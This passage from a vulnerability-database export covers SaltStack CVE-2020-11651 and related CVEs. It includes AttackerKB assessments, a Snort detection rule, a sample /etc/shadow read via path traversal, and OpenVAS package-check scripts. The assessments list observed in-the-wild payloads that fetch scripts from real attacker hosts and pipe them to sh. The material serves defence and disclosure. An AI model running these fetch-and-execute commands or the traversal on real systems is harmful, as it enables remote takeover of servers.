content:\"_prep_auth_info\"; sid:1000000; rev:1;)`\n\nOn the wire it looks a bit like this so a stronger rule can be created \n`b'\\x82\\xa3enc\\xa5clear\\xa4load\\x81\\xa3cmd\\xaf_prep_auth_info'`\n\n#### In the wild\n\nThe following IPS have been observed sending malicious payloads. other IPS have been seen scanning.\n\n * 95.181.178.108 \n\n * 89.151.132.112 \n\n * 89.27.255.58 \n\n * 104.244.76.189 \n\n * 95.213.139.92 \n\n * 81.92.218.74 \n\n * 178.44.87.133 \n\n\n#### Payloads\n\nThe following Payloads have been observed\n\n * `(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh` \n\n * `import subprocess;subprocess.call(\\\"(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh\\\",shell=True)` \n\n * `/bin/sh -c '(wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://94.253.90.22:44444/ || curl -fs --connect-timeout 5 -m10 --retry 3 http://94.253.90.22:44444/)|sh -s -- 94.253.90.22:44445 G9/kjA/vdOSlUG3q+lz6DZwzr0rgiNWRfbb2UZcnYgmUY01gHW5tQrS6SgjiN/6doZfjvmc='` \n\n * `(curl -s anagima3.top/sa.sh||wget -q -O- anagima3.top/sa.sh)|sh` \n\n * `(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh` \n\n * `(curl -s 176.104.3.35/?6920||wget -q -O- 176.104.3.35/?6920)|sh` \n\n * `/bin/sh -c 'wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://217.25.227.174:44444/?i=[redacted_ip]` \n\n\n**wvu-r7** at May 04, 2020 7:36am UTC reported:\n\n#### Overview\n\nFor Salt Master before 2019.2.4 and 3000 before 3000.2 there is potential for RCE as root.\n\nIf a salt-master has its ZeroMQ ports `4506` exposed to the public it is possible for an unauthenticated user to gain access to the root_key. With access to the root key it is possible to run a wide range of salt commands that include file read, file write and command execution. These commands can be executed on the salt-master and any minion that is connected.\n\nThis requires multiple socket requests. one to read the key and then additional requests to create jobs.\n\n#### Proof Of Concept\n\nThis POC was tested on SaltStack 2019.2.0\n\nAs of the time of writing this assessment I have been able to create a functional exploit POC. The Code can be found here \u2013 <https://github.com/kevthehermit/CVE-2020-11651>\n\nThe POC and others I am sure will appear shortly has the following functionality\n\n * Read the root key \n\n * Read and Write files on the Salt Master \n\n * Construct a payload to gain full RCE as root on any connected Minion \n\n\nThis took several hours and is \u201ceasy\u201d with the available information and access to a test instance. Details on the discovery process can be found on our blog \u2013 <https://immersivelabs.com/2020/05/06/hackers-are-currently-attacking-vulnerable-saltstack-systems/>\n\n#### Mitigations:\n\nPatch to the latest versions and do not expose theses ports to the external network.\n\n#### Detections\n\nexamine `/var/cache/salt/master/jobs/` on the salt master for a listing of all jobs. the `return.p` file in these dirs will contain a detailed description of the request and the response. This data is serialised.\n\nImmersive Labs have released a basic python script to parse all these job files \u2013 <https://immersivelabs.com/2020/05/06/how-to-lock-onto-the-hackers-targeting-saltstack-minions/>\n \n \n # cat /var/cache/salt/master/jobs/65/6e5fa0837ca5f3d391c4d70d345ee25baed089b970a78a934709e80d083f95/7a5388b6a882_master/return.p\n \ufffd\ufffdreturn\ufffd\ufffdfun\ufffdwheel.file_roots.read\ufffdjid\ufffd20200501195107225222\ufffduser\ufffdUNKNOWN\ufffdfun_args\ufffd\ufffd../../../../etc/shadow\ufffd\ufffdsaltenv\ufffdbase\ufffd_stamp\ufffd2020-05-01T19:51:07.229260\ufffdreturn\ufffd\ufffd\ufffd /srv/salt/../../../../etc/shadow\ufffd\ufffdroot:!::0:::::\n bin:!::0:::::\n daemon:!::0:::::\n adm:!::0:::::\n lp:!::0:::::\n sync:!::0:::::\n shutdown:!::0:::::\n halt:!::0:::::\n mail:!::0:::::\n news:!::0:::::\n uucp:!::0:::::\n operator:!::0:::::\n man:!::0:::::\n postmaster:!::0:::::\n cron:!::0:::::\n ftp:!::0:::::\n sshd:!::0:::::\n at:!::0:::::\n squid:!::0:::::\n xfs:!::0:::::\n games:!::0:::::\n postgres:!::0:::::\n cyrus:!::0:::::\n vpopmail:!::0:::::\n ntp:!::0:::::\n smmsp:!::0:::::\n guest:!::0:::::\n nobody:!::0:::::\n salt:!:18164:0:99999:7:::\n \n \n\nSnort Rule:\n\n`alert tcp $EXTERNAL_NET any -> $HOME_NET 4506 (msg:\"Salt Stack root_key read attempt\"; content:\"_prep_auth_info\"; sid:1000000; rev:1;)`\n\nOn the wire it looks a bit like this so a stronger rule can be created \n`b'\\x82\\xa3enc\\xa5clear\\xa4load\\x81\\xa3cmd\\xaf_prep_auth_info'`\n\n#### In the wild\n\nThe following IPS have been observed sending malicious payloads. other IPS have been seen scanning.\n\n * 95.181.178.108 \n\n * 89.151.132.112 \n\n * 89.27.255.58 \n\n * 104.244.76.189 \n\n * 95.213.139.92 \n\n * 81.92.218.74 \n\n * 178.44.87.133 \n\n\n#### Payloads\n\nThe following Payloads have been observed\n\n * `(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh` \n\n * `import subprocess;subprocess.call(\\\"(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh\\\",shell=True)` \n\n * `/bin/sh -c '(wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://94.253.90.22:44444/ || curl -fs --connect-timeout 5 -m10 --retry 3 http://94.253.90.22:44444/)|sh -s -- 94.253.90.22:44445 G9/kjA/vdOSlUG3q+lz6DZwzr0rgiNWRfbb2UZcnYgmUY01gHW5tQrS6SgjiN/6doZfjvmc='` \n\n * `(curl -s anagima3.top/sa.sh||wget -q -O- anagima3.top/sa.sh)|sh` \n\n * `(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh` \n\n * `(curl -s 176.104.3.35/?6920||wget -q -O- 176.104.3.35/?6920)|sh` \n\n * `/bin/sh -c 'wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://217.25.227.174:44444/?i=[redacted_ip]` \n\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-30T00:00:00", "type": "attackerkb", "title": "CVE-2020-11651", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651"], "modified": "2020-08-28T00:00:00", "id": "AKB:C964B102-C1A8-42E7-AE93-2D5FCBAD769C", "href": "https://attackerkb.com/topics/rEVl04z1p0/cve-2020-11651", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:13:12", "description": "In SaltStack Salt through 3002, salt-netapi improperly validates eauth credentials and tokens. A user can bypass authentication and invoke Salt SSH.\n\n \n**Recent assessments:** \n \n**wvu-r7** at November 10, 2020 11:51pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/TCY0EUyJIW/cve-2020-25592-saltstack-authentication-bypass-and-salt-ssh-command-execution#rapid7-analysis>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-06T00:00:00", "type": "attackerkb", "title": "CVE-2020-25592 \u2014 SaltStack Authentication Bypass and Salt SSH Command Execution", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-16846", "CVE-2020-25592"], "modified": "2020-11-17T00:00:00", "id": "AKB:C751071A-7880-42C8-A7D3-732A54F317B3", "href": "https://attackerkb.com/topics/TCY0EUyJIW/cve-2020-25592-saltstack-authentication-bypass-and-salt-ssh-command-execution", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:13:11", "description": "An issue was discovered in SaltStack Salt through 3002. Sending crafted web requests to the Salt API, with the SSH client enabled, can result in shell injection.\n\n \n**Recent assessments:** \n \n**wvu-r7** at November 11, 2020 6:34am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/FrF3udya6o/cve-2020-16846-saltstack-unauthenticated-shell-injection#rapid7-analysis>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-06T00:00:00", "type": "attackerkb", "title": "CVE-2020-16846 \u2014 SaltStack Unauthenticated Shell Injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-16846", "CVE-2020-25592"], "modified": "2020-11-17T00:00:00", "id": "AKB:87D730E9-750C-46D0-8C95-7F3FC0F5847C", "href": "https://attackerkb.com/topics/FrF3udya6o/cve-2020-16846-saltstack-unauthenticated-shell-injection", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-05-12T15:13:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "description": "The remote host is missing an update for the ", "modified": "2020-05-11T00:00:00", "published": "2020-05-01T00:00:00", "id": "OPENVAS:1361412562310853131", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310853131", "type": "openvas", "title": "openSUSE: Security Advisory for salt (openSUSE-SU-2020:0564-1)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.853131\");\n script_version(\"2020-05-11T07:05:27+0000\");\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-11 07:05:27 +0000 (Mon, 11 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-01 03:01:53 +0000 (Fri, 01 May 2020)\");\n script_name(\"openSUSE: Security Advisory for salt (openSUSE-SU-2020:0564-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.1\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2020:0564-1\");\n script_xref(name:\"URL\", value:\"http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00047.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'salt'\n package(s) announced via the openSUSE-SU-2020:0564-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for salt fixes the following issues:\n\n - Fix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\n This update was imported from the SUSE:SLE-15-SP1:Update update project.\n\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2020-564=1\");\n\n script_tag(name:\"affected\", value:\"'salt' package(s) on openSUSE Leap 15.1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"python2-salt\", rpm:\"python2-salt~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python3-salt\", rpm:\"python3-salt~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt\", rpm:\"salt~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-api\", rpm:\"salt-api~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-cloud\", rpm:\"salt-cloud~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-doc\", rpm:\"salt-doc~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-master\", rpm:\"salt-master~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-minion\", rpm:\"salt-minion~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-proxy\", rpm:\"salt-proxy~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-ssh\", rpm:\"salt-ssh~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-standalone-formulas-configuration\", rpm:\"salt-standalone-formulas-configuration~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-syndic\", rpm:\"salt-syndic~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-bash-completion\", rpm:\"salt-bash-completion~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-fish-completion\", rpm:\"salt-fish-completion~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-zsh-completion\", rpm:\"salt-zsh-completion~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-03T15:55:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "description": "The remote host is missing an update for the ", "modified": "2020-05-31T00:00:00", "published": "2020-05-31T00:00:00", "id": "OPENVAS:1361412562310892223", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892223", "type": "openvas", "title": "Debian LTS: Security Advisory for salt (DLA-2223-1)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892223\");\n script_version(\"2020-05-31T03:00:08+0000\");\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-31 03:00:08 +0000 (Sun, 31 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-31 03:00:08 +0000 (Sun, 31 May 2020)\");\n script_name(\"Debian LTS: Security Advisory for salt (DLA-2223-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2020/05/msg00027.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-2223-1\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/959684\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'salt'\n package(s) announced via the DLA-2223-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several vulnerabilities were discovered in package salt, a\nconfiguration management and infrastructure automation software.\n\nCVE-2020-11651\n\nThe salt-master process ClearFuncs class does not properly validate\nmethod calls. This allows a remote user to access some methods\nwithout authentication. These methods can be used to retrieve user\ntokens from the salt master and/or run arbitrary commands on salt\nminions.\n\nCVE-2020-11652\n\nThe salt-master process ClearFuncs class allows access to some\nmethods that improperly sanitize paths. These methods allow\narbitrary directory access to authenticated users.\");\n\n script_tag(name:\"affected\", value:\"'salt' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n2014.1.13+ds-3+deb8u1.\n\nWe recommend that you upgrade your salt packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"salt-cloud\", ver:\"2014.1.13+ds-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-common\", ver:\"2014.1.13+ds-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-doc\", ver:\"2014.1.13+ds-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-master\", ver:\"2014.1.13+ds-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-minion\", ver:\"2014.1.13+ds-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-ssh\", ver:\"2014.1.13+ds-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-syndic\", ver:\"2014.1.13+ds-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T17:13:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-11652", "CVE-2020-11651", "CVE-2019-17361"], "description": "The remote host is missing an update for the ", "modified": "2020-05-07T00:00:00", "published": "2020-05-07T00:00:00", "id": "OPENVAS:1361412562310704676", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704676", "type": "openvas", "title": "Debian: Security Advisory for salt (DSA-4676-1)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704676\");\n script_version(\"2020-05-07T03:00:32+0000\");\n script_cve_id(\"CVE-2019-17361\", \"CVE-2020-11651\", \"CVE-2020-11652\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-07 03:00:32 +0000 (Thu, 07 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-07 03:00:32 +0000 (Thu, 07 May 2020)\");\n script_name(\"Debian: Security Advisory for salt (DSA-4676-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(9|10)\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2020/dsa-4676.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4676-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'salt'\n package(s) announced via the DSA-4676-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several vulnerabilities were discovered in salt, a powerful remote\nexecution manager, which could result in retrieve of user tokens from\nthe salt master, execution of arbitrary commands on salt minions,\narbitrary directory access to authenticated users or arbitrary code\nexecution on salt-api hosts.\");\n\n script_tag(name:\"affected\", value:\"'salt' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the oldstable distribution (stretch), these problems have been fixed\nin version 2016.11.2+ds-1+deb9u3.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2018.3.4+dfsg1-6+deb10u1.\n\nWe recommend that you upgrade your salt packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"salt-api\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-cloud\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-common\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-doc\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-master\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-minion\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-proxy\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-ssh\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-syndic\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-api\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-cloud\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-common\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-doc\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-master\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-minion\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-proxy\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-ssh\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-syndic\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": 